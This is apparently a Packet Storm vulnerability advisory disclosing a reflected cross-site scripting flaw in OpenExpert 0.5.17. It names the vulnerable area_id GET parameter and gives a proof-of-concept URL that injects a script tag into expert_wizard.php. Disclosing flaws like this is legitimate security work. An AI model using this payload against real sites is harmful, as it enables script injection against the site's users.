OpenExpert 0.5.17 Cross Site Scripting

2017-01-18T00:00:00
ID PACKETSTORM:140559
Type packetstorm
Reporter Nassim Asrir
Modified 2017-01-18T00:00:00

Description

                                        
                                            `# Title : Openexpert 0.5.17 - Cross Site Scripting  
  
# Author: Nassim Asrir  
  
# Author Company: Henceforth  
  
# Tested on: Winxp sp3 - win7  
  
# Vendor: https://sourceforge.net/projects/law-expert/  
  
# Download Software: https://sourceforge.net/projects/law-expert/files/  
  
#################################################  
  
## About The Product : ##  
  
OpenExpert. Dual use Web based and Easy to Use Expert System or Education System.  
  
## Vulnerability : ##   
  
- Vulnerable Parametre : area_id  
  
- HTTP Method : GET  
  
- To exploit it : http://HOST/expert_wizard.php?area_id="><script>alert(1);</script>  
  
`